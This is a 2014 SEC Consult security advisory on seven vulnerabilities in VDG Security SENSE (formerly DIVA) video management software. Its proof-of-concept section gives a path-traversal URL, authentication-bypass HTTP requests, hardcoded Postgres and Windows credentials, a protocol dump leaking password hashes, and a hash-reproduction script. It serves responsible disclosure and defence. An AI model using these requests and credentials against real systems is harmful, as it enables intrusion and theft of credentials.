Multiple critical vulnerabilities in VDG Security SENSE

SEC Consult Vulnerability Lab Security Advisory < 20141218-0 >

=======================================================================

title: Multiple critical vulnerabilities

product: VDG Security SENSE (formerly DIVA)

vulnerable version: 2.3.13

fixed version: unknown - no vendor confirmation

impact: critical

homepage: vdgsecurity.com

found: 2014-10-01

by: Stefan Viehböck

SEC Consult Vulnerability Lab

www.sec-consult.com

=======================================================================

 

Vendor description:

-------------------

"VDG Sense is our video management system (VMS). VDG Sense gives you control

of all live images and stored video data, in a user-friendly interface. Our

solution is based on an open platform, tailored to your specific needs and

requirements and ready to be integrated in any security solution."

Source: vdgsecurity.com/sense/

 

"DIVA is our former trademark, which we used to brand our video management

software and other VDG products. With the launch of our new trademark, VDG

Sense, we have rebranded the software to VDG Sense and promote it as such

from September 15, 2014. Other products, such as our servers, are available

under the label VDG."

Source: vdgsecurity.com/diva/

 

 

Business recommendation:

------------------------

Attackers are able to completely compromise the VDG SENSE server as they can

gain access at the system level. SENSE server can be used as an entry point

into the target infrastructure (lateral movement, privilege escalation).

 

It is highly recommended by SEC Consult not to use this software until a

thorough security review has been performed by security professionals and all

identified issues have been resolved.

 

Although the vendor does not respond to our mails any more, some

vulnerabilities seem to be fixed in the most recent version of SENSE (2.3.15).

It is assumed that further critical vulnerabilities exist.

 

 

Vulnerability overview/description:

-----------------------------------

1) Unauthenticated local file disclosure

Unauthenticated users can read arbitrary files from the filesystem with the

privileges of the "SYSTEM" operating system user. These files include

configuration files containing sensitive information such as clear text

passwords/password hashes which can be used in further attacks.

 

 

2) Authentication bypass / Clear text password disclosure

Some parts of the DIVA application are vulnerable to authentication bypass. This

allows attackers to update DIVA plugin configuration. Furthermore DIVA plugin

configurations can be read. This configuration includes clear text DIVA

administrator credentials as DIVA plugins requires access to such an account

for operation.

 

 

3) Insecure service configuration / Hardcoded default credentials - Postgres

The PostgreSQL database is offered via the network (TCP port 5432) and can be

accessed remotely using hardcoded credentials which can't be changed.

 

 

4) Hardcoded default credentials - Windows Users

Several local Windows users are created in the course of the DIVA setup. These

are used to run some of the DIVA services. These users can be used to log on to the

server running DIVA.

 

 

5) Critical information disclosure / User database leakage

After authentication with the DIVA (fat) client via the proprietary protocol

(TCP port 51410) the server returns the contents of the user database

to the client. This works regardless of whether the user has administrator

rights or not.

The user database (users.ini) contains all users and their password hashes.

This information is sufficient to log in as another user. An attacker does not

require knowledge about plain text passwords.

 

 

6) Use of plain text protocols

All DIVA communication transport channels (eg. vie TCP port 80, 51410) lack

encryption.

 

 

7) Buffer overflow vulnerabilities

The DIVA web service API (/webservice) is vulnerable to a stack based buffer

overflow when processing "AuthenticateUser" requests. Both the "user" and the

"password" parameter are vulnerable.

None of the DIVA modules are ASLR-enabled. An exploit that uses ROP to bypass

DEP has been implemented.

 

 

Proof of concept:

-----------------

1) Unauthenticated local file disclosure

Arbitrary files can be downloaded because of vulnerabilities in the proprietary

web server implementation. An example for the x64 hosts:

http:// <host>/images/../../../../Windows/SysWOW64/config/systemprofile/AppData/Roaming/Diva/Settings/users.ini

 

Interesting DIVA-specific files:

config/systemprofile/AppData/Roaming/Diva/Settings/users.ini (DIVA user database)

config/systemprofile/AppData/Roaming/Diva/DivaManager/DivaManager.ini (contains DIVA "master user")

config/systemprofile/AppData/Roaming/Diva/DivaManager/Plugins/ (DIVA plugin configurations)

[...]

 

2) Authentication bypass / Clear text password disclosure

Authentication for parts of the application can be bypassed by sending the HTTP

Authorization header containing a colon ":".

 

GET /plugins/divacal/getsettings?sessionkey= HTTP/1.1

Host: <host>

Authorization: Basic Og==

 

The response contains the plugin configuration for "divacal":

 

HTTP/1.1 200 OK
Date: Thu, 23 Okt 2014 10:46:28 GMT
Server: Diva HTTP Plugin 2.0
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Type: application/xml; charset=UTF-8
Content-Length: 1179

<?xml version="1.0" ?>
<?xml-stylesheet type="text/xsl" href="../../xml/settings.xsl" ?>
<settings>
  <name>DivaCal settings</name>
  <group>
    <id>0</id>
    <name>DIVA Connection</name>
    <singleinstance>yes</singleinstance>
    <showbuttons>yes</showbuttons>
    <subgroup>
[...]
      <setting>
        <id>1</id>
        <name>DIVAUsername</name>
        <type>string</type>
        <value>Administrator</value>
        <default>Administrator</default>
        <help>The username used to login to to the DIVA management server.</help>
      </setting>
      <setting>
        <id>2</id>
        <name>DIVAPassword</name>
        <type>password</type>
        <value>!DVadmin</value>
        <default>!DVadmin</default>
        <help>The password required to login to the DIVA management server.</help>
      </setting>
    </subgroup>
  </group>
</settings>

 

Other activated plugins can be queried via the following request:

GET /plugins/?sessionkey= HTTP/1.1

Host: <host>

Authorization: Basic Og==

 

 

Plugin settings can be updated as follows:

POST /plugins/http/updatesettings?sessionkey= HTTP/1.1

Host: <host>

Authorization: Basic Og==

Content-Length: 29

groupid=0&DocumentRoot=htdocs

 

 

3) Insecure service configuration / Hardcoded default credentials - Postgres

The Postgres root user is as follows:

 

Username: root

Password: ArpaRomaWi

 

 

4) Hardcoded default credentials - Windows Users

The created Windows users are as follows:

 

Username: postgres

Password: !DVService

 

Username: NTP

Password: !DVService

 

 

5) Critical information disclosure / User database leakage

Below is an excerpt from the DIVA protocol communication (TCP port 51410):

    00000000  48 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 H....... ........ <- SERVER
    00000010  00 00 00 00 0d 00 00 20  01 00 02 20 03 00 00 20 .......  ... ... 
    00000020  06 00 11 00 32 2e 33 2e  31 33 00 00 02 00 00 20 ....2.3. 13..... 
    00000030  01 00 02 40 04 00 00 00  04 00 00 20 06 00 11 00 ...@.... ... ....
    00000040  44 69 76 61 20 73 65 72  76 65 72 00             Diva ser ver.
00000000  b8 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........     <- CLIENT
00000010  00 00 00 00 29 00 00 20  c9 00 02 40 05 00 00 20 ....)..  ...@...      Note: client sends passwordHash and digestHash
00000020  f6 01 01 40 61 64 6d 69  6e 69 73 74 72 61 74 6f ...@admi nistrato
00000030  72 00 00 00 09 00 00 20  f7 01 01 40 49 41 68 6b r......  ...@IAhk
00000040  43 72 33 61 68 7a 59 39  67 53 57 73 56 37 33 6b Cr3ahzY9 gSWsV73k
00000050  41 42 32 64 51 79 38 3d  00 00 00 00 0a 00 00 20 AB2dQy8= ....... 
00000060  fa 01 01 40 35 34 38 31  35 36 32 31 38 64 33 65 ...@5481 56218d3e
00000070  31 63 35 35 66 63 30 30  35 65 38 32 61 32 32 30 1c55fc00 5e82a220
00000080  61 34 63 30 00 00 00 00  02 00 00 20 05 00 11 40 a4c0.... ... ...@
00000090  02 00 00 00 03 00 00 20  0b 00 11 40 00 00 00 00 .......  ...@....
000000A0  00 00 00 00 02 00 00 20  0f 00 11 40 00 00 00 00 .......  ...@....
000000B0  02 00 00 20 02 00 11 40  00 00 00 00             ... ...@ ....
    0000004C  30 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 0....... ........ <- SERVER
    0000005C  00 00 00 00 07 00 00 20  ca 00 02 40 02 00 00 20 .......  ...@... 
    0000006C  f5 01 01 40 01 00 00 00  02 00 00 20 02 00 11 40 ...@.... ... ...@
    0000007C  01 00 00 00                                      ....
000000BC  50 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 P....... ........     <- CLIENT
000000CC  00 00 00 00 0f 00 00 20  01 00 1c 40 0b 00 00 20 .......  ...@... 
000000DC  02 00 1c 40 47 45 54 20  2f 75 73 65 72 6d 61 6e ...@GET  /userman
000000EC  61 67 65 6d 65 6e 74 2f  6f 73 64 73 74 79 6c 65 agement/ osdstyle
000000FC  73 20 44 49 56 41 2f 31  2e 30 00 00 01 00 00 20 s DIVA/1 .0..... 
0000010C  03 00 1c 40                                      ...@
    00000080  24 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 $....... ........ <- SERVER
    00000090  00 00 00 00 04 00 00 20  07 01 11 40 02 00 00 20 .......  ...@... 
    000000A0  06 00 11 00 00 00 00 00  24 00 00 00 00 00 00 00 ........ $.......
[...]
    00000200  9c 02 01 40 02 00 00 20  06 00 11 00 0d 0a 00 00 ...@...  ........
    00000210  bc 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
    00000220  00 00 00 00 2a 00 00 20  f4 01 01 40 28 00 00 20 ....*..  ...@(.. 
    00000230  06 00 11 00 5b 61 64 6d  69 6e 69 73 74 72 61 74 ....[adm inistrat -----
    00000240  6f 72 5d 0d 0a 61 64 6d  69 6e 72 69 67 68 74 73 or]..adm inrights |
    00000250  3d 31 0d 0a 61 6e 64 72  6f 69 64 3d 0d 0a 64 69 =1..andr oid=..di |
    00000260  67 65 73 74 48 61 73 68  3d 35 34 38 31 35 36 32 gestHash =5481562 |
    00000270  31 38 64 33 65 31 63 35  35 66 63 30 30 35 65 38 18d3e1c5 5fc005e8 |
    00000280  32 61 32 32 30 61 34 63  30 0d 0a 65 6d 61 69 6c 2a220a4c 0..email | <- DIVA user database
    00000290  3d 0d 0a 66 75 6c 6c 6e  61 6d 65 3d 0d 0a 69 6f =..fulln ame=..io |
    000002A0  73 3d 0d 0a 70 61 73 73  77 6f 72 64 3d 49 41 68 s=..pass word=IAh |
    000002B0  6b 43 72 33 61 68 7a 59  39 67 53 57 73 56 37 33 kCr3ahzY 9gSWsV73 |
    000002C0  6b 41 42 32 64 51 79 38  3d 0d 0a 0d 0a 00 00 00 kAB2dQy8 =....... -----
    000002D0  24 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 $....... ........

 

For the sake of completeness the password hashing scheme has been reverse

engineered. As both hashes can be used for authentication directly, brute

force attacks against password hashes are not required.

#!/usr/bin/env python
import hashlib
from base64 import b64encode

user='administrator'
password='!DVadmin'

digestHash = hashlib.md5(user+":DIVA:"+password).digest().encode('hex').upper()
passwordHash = b64encode(hashlib.sha1(hashlib.sha1(password).digest()).digest())

print 'digestHash',digestHash
print 'passwordHash',passwordHash

 

6) Use of plain text protocols

No proof of concept necessary.

 

 

7) Buffer overflow vulnerabilities

Detailed proof of concept exploits have been removed for this vulnerability.

 

 

 

Vulnerable / tested versions:

-----------------------------

The vulnerabilities have been verified to exist in 2.3.13, which was the most

recent version at the time of discovery.

 

 

 

Vendor contact timeline:

------------------------

2014-10-24: Sending responsible disclosure policy and requesting encryption

keys.

2014-10-28: Vendor responds, provides encryption keys.

2014-10-29: Sending advisory and proof of concept exploit via encrypted

channel.

2014-10-29: Vendor confirms receipt of advisory.

2014-11-10: Requesting status update.

2014-11-17: Vendor states that team is "very well on track to solve the

issues".

2014-11-18: Clarifying criticality of vulnerabilities and viability of attack,

even in closed networks; referring to Shodan search results.

2014-12-10: Requesting status update. No reply.

2014-12-18: SEC Consult releases security advisory.

 

 

Solution:

---------

It seems some of the vulnerabilities are fixed in the most recent version of

SENSE (2.3.15). The vendor stopped responding to our emails so we don't know

what vulnerabilities were actually fixed.

 

 

Workaround:

-----------

No workaround available.

 

 

Advisory URL:

-------------

www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

 

SEC Consult

Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

 

Headquarter:

Mooslackengasse 17, 1190 Vienna, Austria

Phone: +43 1 8903043 0

Fax: +43 1 8903043 15

 

Mail: research at sec-consult dot com

Web: www.sec-consult.com

Blog: blog.sec-consult.com

Twitter: twitter.com/sec_consult

 

Interested in working with the experts of SEC Consult?

Write to career@sec-consult.com

 

EOF Stefan Viehböck / @2014